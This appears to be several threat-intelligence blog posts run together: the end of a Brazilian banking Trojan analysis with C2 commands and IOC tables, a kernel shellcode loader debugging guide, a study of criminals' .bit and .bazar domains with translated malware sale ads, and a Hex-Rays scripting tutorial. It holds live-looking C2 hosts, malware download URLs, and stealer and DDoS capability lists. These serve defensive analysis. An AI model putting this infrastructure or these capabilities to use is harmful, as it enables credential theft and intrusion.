Figure 21: Host Recon Data Sent to Second C2 Server

The malware alters the value of registry key Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ExtendedUIHoverTime to 2710 in order to change the number of milliseconds a thumbnail is showed while hovering on the taskbar, as seen in Figure 22.


Figure 22: ExtendedUIHoverTime Registry Key Change

Like the Trojan from the first campaign, this sample checks if the foreground window's title contains names of Brazilian banks and digital coins by looking for hardcoded strings.

The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23.


Figure 23: Fake Form Displaying Windows Update

The sample also contains a keylogger functionality, as shown in Figure 24.


Figure 24: Keylogger Function

Command and Control

The Trojan’s command and control command structure is identical to the first sample. The commands are denoted by the <|Command|> syntax.

  • <|OK|> gets a list of banking software installed on the host.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep connection alive.
  • <|dellLemb|> deletes the registry key \Software\Microsoft\Internet Explorer\notes.
  • EXECPROGAM calls ShellExecute to run the application given in the command.
  • EXITEWINDOWS calls ExitWindowsEx.
  • NOVOLEMBRETE creates and stores data sent with the command in the registry key \Software\Microsoft\Internet Explorer\notes.


Figure 25: Partial List of Victims

This sample contains most of the important strings encrypted. We provide the following script (Figure 26) in order to decrypt them.


Figure 26: String Decryption Script

Conclusion

The use of multi-stage infection chains makes it challenging to research these types of campaigns all the way through.

As demonstrated by our research, the attackers are using various techniques to evade detection and infect unsuspecting Portuguese-speaking users with banking Trojans. The use of public cloud infrastructure to help deliver the different stages plays a particularly big role in delivering the malicious payload. The use of different infection methods combined with the abuse of legitimate signed binaries to load malicious code makes these campaigns worth highlighting.

Indicators of Compromise

Campaign #1
TYPE HASH DESCRIPTION
MD5 860fa744d8c82859b41e00761c6e25f3 PE with Embedded HTA
MD5 3e9622d1a6d7b924cefe7d3458070d98 PE with Embedded HTA
MD5 f402a482fd96b0a583be2a265acd5e74 PE with Embedded HTA
MD5 f329107f795654bfc62374f8930d1e12 PE with Embedded HTA
MD5 789a021c051651dbc9e01c5d8c0ce129 PE with Embedded HTA
MD5 68f818fa156d45889f36aeca5dc75a81 PE with Embedded HTA
MD5 c2cc04be25f227b13bcb0b1d9811e2fe cryptui.dll
MD5 6d2cb9e726c9fac0fb36afc377be3aec id
MD5 dd73f749d40146b6c0d2759ba78b1764 i4.dt
MD5 d9d1e72165601012b9d959bd250997b3 VBS file with commands to create staging directories for malware
MD5 03e4f8327fbb6844e78fda7cdae2e8ad pvk2pfx.exe [Legit Windows Tool]
URL   hxxp://5.83.162.24/ilha/pz/logs.php
URL   hxxp://5.83.162.24/28022018/pz.zip 
C2   ibamanetibamagovbr[.]org/virada/pz/logs.php
URL   sistemasagriculturagov[.]org
URL   hxxp://187.84.229.107/05022018/al.zip
Campaign #2
TYPE HASH DESCRIPTION
MD5 2999724b1aa19b8238d4217565e31c8e AutoIT Dropper
MD5 181c8f19f974ad8a84b8673d487bbf0d img1.jpg [lLegit Windows Tool]
MD5 d3f845c84a2bd8e3589a6fbf395fea06 img2.jpg [Banking Trojan]
MD5 2365fb50eeb6c4476218507008d9a00b Variants of Banking Trojan
MD5 d726b53461a4ec858925ed31cef15f1e Variants of Banking Trojan
MD5 a8b2b6e63daf4ca3e065d1751cac723b Variants of Banking Trojan
MD5 d9682356e78c3ebca4d001de760848b0 Variants of Banking Trojan
MD5 330721de2a76eed2b461f24bab7b7160 Variants of Banking Trojan
MD5 6734245beda04dcf5af3793c5d547923 Variants of Banking Trojan
MD5 a920b668079b2c1b502fdaee2dd2358f Variants of Banking Trojan
MD5 fe09217cc4119dedbe85d22ad23955a1 Variants of Banking Trojan
MD5 82e2c6b0b116855816497667553bdf11 Variants of Banking Trojan
MD5 4610cdd9d737ecfa1067ac30022d793b Variants of Banking Trojan
MD5 34a8dda75aea25d92cd66da53a718589 Variants of Banking Trojan
MD5 88b808d8164e709df2ca99f73ead2e16 Variants of Banking Trojan
MD5 d3f845c84a2bd8e3589a6fbf395fea06 Variants of Banking Trojan
MD5 28a0968163b6e6857471305aee5c17e9 Variants of Banking Trojan
MD5 1285205ae5dd5fa5544b3855b11b989d Variants of Banking Trojan
MD5 613563d7863b4f9f66590064b88164c8 Variants of Banking Trojan
MD5 3dd43e69f8d71fcc2704eb73c1ea7daf Variants of Banking Trojan
C2   https[:]//panel-dark[.]com/w3af/img2.jpg 
C2   https[:]//panel-dark[.]com/w3af/img1.jpg 

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcomed to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.


Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.

Wrap-Up

We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: Blockchain Infrastructure Use

UPDATE (May 31, 2018): A section of the post on commonly used OpenNIC IPs has been removed to avoid any implication that the OpenNIC IPs are inherently malicious, which is not the case.

Introduction

Cyber criminals have always been attracted to cryptocurrencies because it provides a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a payment method for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity and subsequent rising price of cryptocurrencies by conducting various operations aimed at them, such as malicious cryptocurrency mining, collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

Coinciding with the rising interest in stealing cryptocurrencies, distributed ledger technology (DLT), the technology that underpins cryptocurrencies, has also provided cyber criminals with a unique means of hosting their malicious content. This blog covers the growing trend of cyber criminals using blockchain domains for malicious infrastructure.

Blockchain Infrastructure Use

Traditionally, cyber criminals have used various methods to obfuscate malicious infrastructure that they use to host additional payloads, store stolen data, and/or function as command and control (C2) servers. Traditional methods include using bulletproof hosting, fast-flux, Tor infrastructure, and/or domain generation algorithms (DGAs) to help obfuscate the malicious infrastructure. While we expect cyber criminals to continue to use these techniques for the foreseeable future, another trend is emerging: the use of blockchain infrastructure.

Underground Interest in Blockchain Infrastructure

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency infrastructure-related topics dating back to at least 2009 within underground communities. While searches for certain keywords fail to provide context, the frequency of specific words, such as blockchain, Namecoin, and .bit, show a sharp increase in conversations surrounding these topics beginning in 2015 (Figure 1).


Figure 1: Underground keyword mentions

Namecoin Domains

Namecoin is a cryptocurrency based on the Bitcoin code that is used to register and manage domain names with the top-level domain (TLD) .bit. Everyone who registers a Namecoin domain is essentially their own domain registrar; however, domain registration is not associated with an individual's name or address. Rather, domain ownership is based on the unique encrypted hash of each user. This essentially creates the same anonymous system as Bitcoin for internet infrastructure, in which users are only known through their cryptographic identity. Figure 2 illustrates the Namecoin domain name generation process.


Figure 2: Namecoin domain creation process

As Namecoin is decentralized, with no central authority managing the network, domains registered with Namecoin are resistant to being hijacked or shut down. These factors, coupled with the comparative anonymity, make Namecoin an increasingly attractive option for cyber criminals in need of supporting infrastructure for their malicious operations.

Navigating to Namecoin Domains

Domains registered with Namecoin use the TLD .bit, and are not managed by standard DNS providers. Consequently, a client will be unable to establish a connection to these blockchain domains unless additional configurations are made. According to the Namecoin wiki, individuals can take one of the steps shown in Figure 3 to browse .bit domains.


Figure 3: Options for navigating to Namecoin domains outlined on Namecoin wiki

These options are not ideal for cyber criminals, as downloading the entire blockchain onto an infected host would require significant space and bandwidth, and routing their malicious traffic through an unknown third party could result in their traffic being blocked by the resolver. As a result, many have configured their malware to query their own privately managed Namecoin-compatible OpenNIC DNS (Figure 4), or to query other compatible servers they've purchased through underground infrastructure offerings. Bulletproof hosting providers, such as Group 4, have capitalized on the increased demand for .bit domains by adding support to allow malicious actors to query compatible servers.


Figure 4: Blockchain domain support advertised on OpenNIC website

Underground Advertisements for Namecoin Support

The following underground advertisements relating to the use of .bit domains have been observed by researchers over the past several years. These posts range from actors offering .bit compatible modules or configuration updates for popular banking Trojans to .bit infrastructure offerings.

Sample Advertisement #1

Figure 5 shows an advertisement, observed in late 2015, posted by the actor "wachdog" in a popular Russian-speaking marketplace. The actor advertised a small utility (10 KB in size) that is compatible with both Windows and Android operating systems, and would allow for the communication to and from .bit domains.

Advertisement Translated Text:

The code is written in C+ for WinAPI or Java for Android. It can be used for small stealth applications to access .bit domains.

The registration of new domain costs 0.02 NMC, update of a record - 0.005 NMC.

So, the price for domain registration and update will be approximately 0.0072$ and 0.0018$.

The code works in all Windows starting from XP, it doesn't require additional libraries, admin privileges, it doesn't download a lot of data. The size of compiled code is 10 KB. It's easy to write it in asm, paskal, c#, java etc. It also works for Android (all versions).

You should download the Namecoin wallet, credit it with the minimum amount of NMC and register your own domain using the wallet. IP of C&C can be linked to the domain also using the wallet (one of many, everything works as for normal DNS). Create a build of your software locked to .bit domain. In case the IP of your server is listed, just change the DNS record and assign your domain a new IP for just for 0.005 NMC. No need in new rebuild or registration of new domains. .bit domain cannot be taken, botnet cannot be stolen.

Price:

Technology + code in C: $300 USD

Technology + code in C + code in Java for Android: $400 USD
Payment methods: BTC, PerfectMoney

Figure 5: Actor "wachdog" advertises utility to connect to .bit domains in late 2015

Sample Advertisement #2

In late 2017, actor "Discomrade" advertised a new HTTP distributed denial of service (DDoS) malware named "Coala" on a prominent Russian-language underground forum (Figure 6). According to the advertisement, Coala focuses on L7 (HTTP) attacks and can overcome Cloudflare, OVH, and BlazingFast DDoS protections. The original posting stated that the actor was working on adding support for .bit domains, and later updated the forum post to specify that Coala was able to support .bit domain communications.

Advertisement Translated Text:

Coala - Http DDoS Bot, .net 2.0, bypass cloudflare/ovh/blazi...
The sale resumed.

I changed my decision to rewrite the bot from the scratch on native language.
I'm looking forward to hearing any ideas / comments/ questions you have about improving this DDoS bot.
I updated and enhanced the bot using your previous comments and requests (changed communication model between server and bot, etc)

I added the following features/options/abilities:

- to customize the HTTP-headers (user-agent, cookie, referrer)
- to set task limits
- to count the number of bots used for particular task
- to read the answer from a server
- to use async sockets
- to set the number of sockets per timeout
- to set the number of HTTP-requests per socket
- to set custom waiting time
- to set an attack restart periods
- to count the requests per second for particular task

I removed the feature related to DDoS attacks against TOR sites because of its improper functioning and AV detects.

Currently I am working on .bit domains support.

The price: $400
 

Figure 6: Discomrade advertising Coala DDoS malware support for .bit domains

Sample Advertisement #3

The AZORult malware, which was discovered in mid-2016, is offered in underground marketplaces by the actor "CrydBrox." In early 2017, CrydBrox offered an updated variant of the AZORult malware that included .bit support (Figure 7).

Advertisement Translated Text:

 AZORult V2

[+] added .bit domains support
[+] added CC stealing feature (for Chrome-based browsers)
[+] added passwords grabbing from FTP-client WinSCP
[+] added passwords grabbing from Outlook (up to the last version)
[+] fixed passwords grabbing from Firefox and Thunderbird
[+] added the feature to examine what privileges were used to run stealer
[+] provided encrypted communication between management panel and the stealer
[+] added AntiVirtualMachine, AntiSandbox, AntiDebug techniques
[+] fixed logs collection feature (excluded info about file operations)
[+] accelerated the work of stealer process
[+] removed .tls section from binary file
[+] added ability to search logs by cookies content (in management panel)
[+] added the view of the numbers of passwords/CC/CoinsWallet and files in logs to management panel
[+] added the commenting feature to logs
[+] added viewing of the stats by country, architecture, system version, privileges, collected passwords
[+] added new filters and improved of old filters

There are 4 variants of the stealer:
AU2_EXE.exe - run and send the report
AU2_EXEsd.exe - run, send the report and remove itself
AU2_DLL.dll - collect info after the load into the process, send data and return the control to the process
AU2_DLLT.dll - after the loading of the DLL into the process it creates the separate thread for stealer work
*DLL versions successfully work with all popular bots.
The size – 495 KB, packed with UPX – 220 KB

The prices:
1 build - $100
rebuild - $30
 

Figure 7: CrydBrox advertising AZORult support for .bit domains

Namecoin Usage Analysis

Coinciding with malicious actors' increasing interest in using .bit domains is a growing number of malware families that are being configured to use them. Malware families that we have observed using Namecoin domains as part of their C2 infrastructure include:

  • Necurs
  • AZORult
  • Neutrino (aka Kasidet, MWZLesson)
  • Corebot
  • SNATCH
  • Coala DDoS
  • CHESSYLITE
  • Emotet
  • Terdot
  • Gandcrab Ransomware
  • SmokeLoader (aka Dofoil)

Based on our analysis of samples configured to used .bit, the following methods are commonly used by malware families to connect to these domains:

  • Query hard-coded OpenNIC IP address(es)
  • Query hard-coded DNS server(s)

AZORult

The AZORult sample (MD5: 3a3f739fceeedc38544f2c4b699674c5) was configured to support the use of .bit communications, although it did not connect to a Namecoin domain during analysis. The sample first checks if the command and control (C2) domain contains the string ".bit" and, if so, the malware will query the following hard-coded OpenNIC IP addresses to try to resolve the domain (Figure 8 and Figure 9):

  • 89.18.27.34
  • 87.98.175.85
  • 185.121.177.53
  • 193.183.98.154
  • 185.121.177.177
  • 5.9.49.12
  • 62.113.203.99
  • 130.255.73.90
  • 5.135.183.146
  • 188.165.200.156


Figure 8: Hard-coded OpenNIC IP addresses - AZORult


Figure 9: AZORult code for resolving C&C domains

CHESSYLITE

The analyzed CHESSYLITE sample (MD5: ECEA3030CCE05B23301B3F2DE2680ABD) contains the following hard-coded .bit domains:

  • Leomoon[.]bit
  • lookstat[.]bit
  • sysmonitor[.]bit
  • volstat[.]bit
  • xoonday[.]bit

The malware attempts to resolve those domains by querying the following list of hard-coded OpenNIC IP addresses:

  • 69.164.196.21
  • 107.150.40.234
  • 89.18.27.34
  • 193.183.98.154
  • 185.97.7.7
  • 162.211.64.20
  • 217.12.210.54
  • 51.255.167.0
  • 91.121.155.13
  • 87.98.175.85

Once the .bit domain has been resolved, the malware will issue an encoded beacon to the server (Figure 10).


Figure 10: CHESSYLITE sample connecting to xoonday.bit and issuing beacon

Neutrino (aka Kasidet, MWZLesson)

The analyzed Neutrino sample (MD5: C102389F7A4121B09C9ACDB0155B8F70) contains the following hard-coded Namecoin C2 domain:

  • brownsloboz[.]bit

Instead of using hard-coded OpenNIC IP addresses to resolve its C2 domain, the sample issues DnsQuery_A API calls to the following DNS servers:

  • 8.8.8.8
  • sourpuss.[]net
  • ns1.opennameserver[.]org
  • freya.stelas[.]de
  • ns.dotbit[.]me
  • ns1.moderntld[.]com
  • ns1.rodgerbruce[.]com
  • ns14.ns.ph2network[.]org
  • newton.bambusoft[.]mx
  • secondary.server.edv-froehlich[.]de
  • philipostendorf[.]de
  • a.dnspod[.]com
  • b.dnspod[.]com
  • c.dnspod[.]com

The malware is configured to run through the list in the aforementioned order. Hence, if a DnsQuery_A call to 8.8.8.8 fails, the malware will try sourpuss[.]net, and so on (Figure 11). Through network emulation techniques, we simulated a resolved connection in order to observe the sample's behavior with the .bit domain.


Figure 11: Modified 8.8.8.8 to 8.8.8.5 to force query failure

Monero Miner

The analyzed Monero cryptocurrency miner (MD5: FA1937B188CBB7fD371984010564DB6E) revealed the use of .bit for initial beacon communications. This miner uses the DnsQuery_A API call and connects to the OpenNIC IP address 185.121.177.177 to resolve the domain flashupd[.]bit (Figure 12 and Figure 13).


Figure 12: Code snippet for resolving the .bit domain


Figure 13: DNS request to OpenNIC IP 185.121.177.177

Terdot (aka ZLoader, DELoader)

The analyzed Terdot sample (MD5: 347c574f7d07998e321f3d35a533bd99) includes the ability to communicate with .bit domains, seemingly to download additional payloads. It attempts resolution by querying the following list of OpenNIC and public DNS IP addresses:

  • 185.121.177.53
  • 185.121.177.177
  • 45.63.25.55
  • 111.67.16.202
  • 142.4.204.111
  • 142.4.205.47
  • 31.3.135.232
  • 62.113.203.55
  • 37.228.151.133
  • 144.76.133.38

This sample iterates through the hard-coded IPs in attempts to access the domain cyber7[.]bit (Figure 14). If the domain resolves, it will connect to https://cyber7[.]bit/blog/ajax.php to download data that is RC4 encrypted and expected to contain a PE file.


Figure 14: DNS requests for cyber7.bit domain

Gandcrab Ransomware

The analyzed Gandcrab ransomware sample (MD5: 9abe40bc867d1094c7c0551ab0a28210) also revealed the use of .bit domains. Unlike previously mentioned families, it spawns a new nslookup process via an anonymous pipe to resolve the following blockchain domains:

  • Bleepingcomputer[.]bit
  • Nomoreransom[.]bit
  • esetnod32[.]bit
  • emsisoft[.]bit
  • gandcrab[.]bit

The spawned nslookup process contains the following command (as seen in Figure 15):

  • nslookup <domain>  a.dnspod.com


Figure 15: GandCrab nslookup process creation and command

Emercoin Domains

FireEye iSIGHT Intelligence researchers have identified other blockchain domains being used by cyber criminals, including Emercoin domains .bazar and .coin. Similar to the Namecoin TLD, all records are completely decentralized, un-censorable, and cannot be altered, revoked, or suspended.

Navigating to Emercoin Domains

Emercoin also maintains a peering agreement with OpenNIC, meaning domains registered with the Emercoin's EMCDNS service are accessible to all users of OpenNIC DNS servers. Current root zones supported by EMCDNS are shown in Table 3.

Zone

Intended Purpose

.coin

digital currency and commerce websites

.emc

websites associated with the Emercoin project

.lib

from the words Library and Liberty - that is, knowledge and freedom

.bazar

marketplace

Table 3: Emercoin-supported DNS zones (Emercoin Wiki)

Users also have the option of installing compatible browser plugins that will navigate to Emercoin domains, or routing their traffic through emergate[.]net, which is a gateway maintained by the Emercoin developers.

Emercoin Domain Usage

FireEye iSIGHT Intelligence has observed eCrime actors using Emercoin domains for malicious infrastructure, albeit to a lesser extent. Examples of these operations include:

  • Operators of Joker's Stash, a prolific and well-known card data shop, frequently change the site's URL. Recently, they opted for using a blockchain domain (jstash[.]bazar) instead of Tor, ostensibly for greater operational security.
  • Similarly, the following card shops have also moved to .bazar domains:
    • buybest[.]bazar
    • FRESHSTUFF[.]bazar
    • swipe[.]bazar
    • goodshop[.]bazar
    • easydeals[.]bazar
  • In addition to the hard-coded Namecoin domain, the aforementioned Neutrino sample also contained several hard-coded Emercoin domains:
    • http://brownsloboz[.]bazar
    • http://brownsloboz[.]lib
    • http://brownsloboz[.]emc
  • FireEye iSIGHT Intelligence identified a Gandcrab ransomware sample (MD5: a0259e95e9b3fd7f787134ab2f31ad3c) that leveraged the Emercoin TLD .coin for its C2 communications (Figure 16 and Figure 17).


Figure 16: DNS query for nomoreransom[.]coin


Figure 17: Gandcrab POST request to nomoreransom[.]coin

Outlook

While traditional methods of infrastructure obfuscation such as Tor, bulletproof, and fast-flux hosting will most likely continue for the foreseeable future, we assess that the usage of blockchain domains for malicious infrastructure will continue to gain popularity and usage among cyber criminals worldwide. Coinciding with the expected increase in demand, there will likely be an increasing number of malicious infrastructure offerings within the underground communities that support blockchain domains.

Due to the decentralized and replicated nature of a blockchain, law enforcement takedowns of a malicious domain would likely require that the entire blockchain be shut down – something that is unfeasible to do as many legitimate services run on these blockchains. If law enforcement agencies can identify the individual(s) managing specific malicious blockchain domains, the potential for these takedowns could occur; however, the likelihood for this to happen is heavily reliant on the operational security level maintained by the eCrime actors. Further, as cyber criminals continue to develop methods of infrastructure obfuscation and protection, blockchain domain takedowns will continue to prove difficult.

Solving Ad-hoc Problems with Hex-Rays API

Introduction

IDA Pro is the de facto standard when it comes to binary reverse engineering. Besides being a great disassembler and debugger, it is possible to extend it and include a powerful decompiler by purchasing an additional license from Hex-Rays. The ability to switch between disassembled and decompiled code can greatly reduce the analysis time.

The decompiler (from now on referred to as Hex-Rays) has been around for a long time and has achieved a good level of maturity. However, there seems to be a lack of a concise and complete resources regarding this topic (tutorials or otherwise). In this blog, we aim to close that gap by showcasing examples where scripting Hex-Rays goes a long way.

Overview of a Decompiler

In order to understand how the decompiler works, it’s helpful to first review the normal compilation process.

Compilation and decompilation center around the concept of an Abstract Syntax Tree (AST). In essence, a compiler takes the source code, splits it into tokens according to a grammar, then these tokens are grouped into logical expressions. In this phase of the compilation process, referred to as parsing, the code structure is represented as a complex object, the AST. From the AST, the compiler will produce assembly code for the specified platform.

A decompiler takes the opposite route. From the given assembly code, it works back to produce an AST, and from this to produce pseudocode.

From all the intermediate steps between code and assembly, we are stressing the AST so much because most of the time you will spend using the Hex-Rays API, you will actually be reading and/or modifying the Abstract Syntax Tree (or ctree in Hex-Rays terminology).

Items, Expressions and Statements

Now we know that Hex-Rays’s ctree is a tree-like data structure. The nodes of this tree are either of type cinsn_t or cexpr_t. We will define these in a moment, but for now it is important to know that both derive from a very basic type, namely the citem_t type, as seen in the following code snippet:

Therefore, all nodes in the ctree will have the op property, which indicates the node type (variable, number, logical expression, etc.).

The type of op (ctype_t) is an enumeration where all constants are named either cit_<xyz> (for statements) or cot_<xyz> (for expressions). Keep this in mind, as it will be very important. A quick way to inspect all ctype_t constants and their values is to execute the following code snippet:

This produces the following output:

Let’s dive a bit deeper and explain the two types of nodes: expressions and statements.

It is useful to think about expressions as the “the little logical elements” of your code. They range from simple types such as variables, strings or numerical constants, to small code constructs (assignments, comparisons, additions, logical operations, array indexing, etc.).

These are of type cexpr_t, a large structure containing several members. The members that can be accessed depend on its op value. For example, the member n to obtain the numeric value only makes sense when dealing with constants.

On the other side, we have statements. These correlate roughly to language keywords (if, for, do, while, return, etc.) Most of them are related to control flow and can be thought as “the big picture elements” of your code.

Recapitulating, we have seen how the decompiler exposes this tree-like structure (the ctree), which consists of two types of nodes: expressions and statements. In order to extract information from or modify the decompiled code, we have to interact with the ctree nodes via methods dependent on the node type. However, the following question arises: “How do we reach the nodes?”

This is done via a class exposed by Hex-Rays: the tree visitor (ctree_visitor_t). This class has two virtual methods, visit_insn and visit_expr, that are executed when a statement or expression is found while traversing the ctree. We can create our own visitor classes by inheriting from this one and overloading the corresponding methods.

Example Scripts

In this section, we will use the Hex-Rays API to solve two real-world problems:

  • Identify calls to GetProcAddress to dynamically resolve Windows APIs, assigning the resulting address to a global variable.
  • Display assignments related to stack strings as characters instead of numbers, for easier readability.

GetProcAddress

The first example we will walk through is how to automatically handle renaming global variables that have been dynamically resolved at run time. This is a common technique malware uses to hide its capabilities from static analysis tools. An example of dynamically resolving global variables using GetProcAddress is shown in Figure 1.


Figure 1: Dynamic API resolution using GetProcAddress

There are several ways to rename the global variables, with the simplest being manual copy and paste. However, this task is very repetitive and can be scripted using the Hex-Rays API.

In order to write any Hex-Rays script, it is important to first visualize the ctree. The Hex-Rays SDK includes a sample, sample5, which can be used to view the current function’s ctree. The amount of data shown in a ctree for a function can be overwhelming. A modified version of the sample was used to produce a picture of a sub-ctree for the function shown in Figure 1. The sub-ctree for the single expression: 'dword_1000B2D8 = (int)GetProcAdress(v0, "CreateThread");' is shown in Figure 2.


Figure 2: Sub-ctree for GetProcAddress assignment

With knowledge of the sub-ctree in use, we can write a script to automatically rename all the global variables that are being assigned using this method.

The code to automatically rename all the local variables is shown in Figure 3. The code works by traversing the ctree looking for calls to the GetProcAddress function. Once found, the code takes the name of the function being resolved and finds the global variable that is being set. The code then uses the IDA MakeName API to rename the address to the correct function.


Figure 3: Function renaming global variables

After the script has been executed, we can see in Figure 4 that all the global variables have been renamed to the appropriate function name.


Figure 4: Global variables renamed

Stack Strings

Our next example is a typical issue when dealing with malware: stack strings. This is a technique aimed to make the analysis harder by using arrays of characters instead of strings in the code. An example can be seen in Figure 5; the malware stores each character’s ASCII value in the stack and then references it in the call to sprintf. At a first glance, it’s very difficult to say what is the meaning of this string (unless of course, you know the ASCII table by heart).


Figure 5: Hex-Rays decompiler output. Stack strings are difficult to read.

Our script will modify these assignments to something more readable. The important part of our code is the ctree visitor mentioned earlier, which is shown in Figure 6.


Figure 6: Custom ctree visitor

The logic implemented here is pretty straightforward. We define our subclass of a ctree visitor (line 1) and override its visit_expr method. This will only kick in when an assignment is found (line 9). Another condition to be met is that the left side of the assignment is a variable and the right side a number (line 15). Moreover, the numeric value must be in the readable ASCII range (lines 20 and 21).

Once this kind of expression is found, we will change the type of the right side from a number to a string (lines 26 to 31), and replace its numerical value by the corresponding ASCII character (line 32).

